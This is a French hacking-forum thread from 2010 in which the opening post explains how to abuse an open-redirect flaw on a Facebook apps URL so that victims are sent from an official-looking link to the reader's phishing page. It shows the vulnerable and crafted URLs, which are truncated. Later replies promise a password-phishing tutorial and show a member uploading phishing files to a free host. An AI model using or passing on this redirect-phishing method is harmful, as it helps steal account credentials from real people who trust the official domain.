Facebook Redirection (Phishing)

Poster un nouveau sujet   Répondre au sujet    OWN3D BY KrL Index du Forum -> French - Hacking -> Hacking site web et forum
Sujet précédent :: Sujet suivant  
Auteur Message
XxViRuSxX
Invité

MessagePosté le: Mar 6 Juil 2010 - 12:28    Sujet du message: Facebook Redirection (Phishing) Répondre en citant

Bonjour à tous, comme je suis passé sur zataz et que facebook ne considère pas le bug trouvé comme une faille de redirection . alors on va l'afficher ici puisque facebook se moque de ces utilisateurs.

Alors c'est très simple, créer une page de phishing relève d'un simplicité absolu .

mais la chose qui coince toujours, c'est dans l'url.

Dans ce cas ci-contre, on va se servir d'une faille de redirection, si vous ne savez pas ce que c'est, aller sur Wikipedia ;-)

Revenons à nos moutons, vous avez votre page pishing uploadé sur votre serveur prêt à faire de gros dégâts :-p

Moi ce que je vous propose, c'est une url officiel de facebook qui permettra à l'utilisateur d'être redirigé sur votre page pirate quand il cliquera dessus.

l'url vulnérable :

http://apps.facebook.com/heureaafceabe/0/preload.aspx?fb_force_mode=iframe&…

Ajoutons notre page pirate :

http://apps.facebook.com/heureaafceabe/0/preload.aspx?fb_force_mode=iframe&…

Regardez quand vous cliquez ici :

http://apps.facebook.com/heureaafceabe/0..._attempt=1

et la magie s'opère :-)

NE JAMAIS DIRE QUE L'IMPOSSIBLE EXISTE

Publicité

MessagePosté le: Mar 6 Juil 2010 - 12:28    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Stup
Invité

MessagePosté le: Mar 27 Juil 2010 - 11:13    Sujet du message: Facebook Redirection (Phishing) Répondre en citant

Ha Oui Pas Mal, tout les liens sont Mort lOl ^^ Je connais un tuto pour sa, et récupérer les MPD Facebook Very Happy Je le poseterais plus Tard Wink

Stup
Invité

MessagePosté le: Ven 30 Juil 2010 - 19:12    Sujet du message: Pirater Facebook Hameçonnage Répondre en citant

Voilà Une Technique assez Simple pour "Hameçoner" des MPD Facebook. (J'ai pas réussi j'ai merder a un endroit lol)
N'ésitez pas a Monter le son au MAX Very Happy

Mr.MiLoO
Invité

MessagePosté le: Ven 30 Juil 2010 - 20:12    Sujet du message: Facebook Redirection (Phishing) Répondre en citant

WAALLALA G MIS LE SON A FOND EST ... RIEN JENTEND RIEN MDR

Stup
Invité

MessagePosté le: Ven 30 Juil 2010 - 20:52    Sujet du message: Facebook Redirection (Phishing) Répondre en citant

lol je m'en doutais, le mieux c'est de la télécharger et de l'ouvrir avec VLC et mettre le Son a 200% Comme j'ai Fais  Okay

Mr.MiLoO
Invité

MessagePosté le: Ven 30 Juil 2010 - 21:04    Sujet du message: Facebook Redirection (Phishing) Répondre en citant

O____O j'y avais pas penser merci Wink

Akah

Masculin
Niveau de hack: Mauvais Niveau
Ou avez vous connu ce forum ??: sur un autre forum
Taureau (20avr-20mai)
Point(s): 34
Moyenne de points: 2,13

MessagePosté le: Mar 31 Aoû 2010 - 21:06    Sujet du message: Facebook Redirection (Phishing) Répondre en citant

Je suis deg j'ai essayer de créer un serveur sur t35.com j'ai essayer avec 3 adresse differante mais toujour pareil je ne recoit pas le mail de confirmation

Akah

Masculin
Niveau de hack: Mauvais Niveau
Ou avez vous connu ce forum ??: sur un autre forum
Taureau (20avr-20mai)
Point(s): 34
Moyenne de points: 2,13

MessagePosté le: Mar 31 Aoû 2010 - 22:11    Sujet du message: Facebook Redirection (Phishing) Répondre en citant

c bon j'ai tout fait mais maintenent quand je veut me connecter sur filzilla sa je peut pas me co sur le port 21 que sur le port 22 saud si aprè je me deco je peut me reco sur 21 mais quand je me co je peut pas les faire glisser mes 3 fichier pourquoi ? Sad

Contenu Sponsorisé

MessagePosté le: Aujourd’hui à 23:20    Sujet du message: Facebook Redirection (Phishing)

Hacking site web et forum
Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

Sauter vers:  
Index | créer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation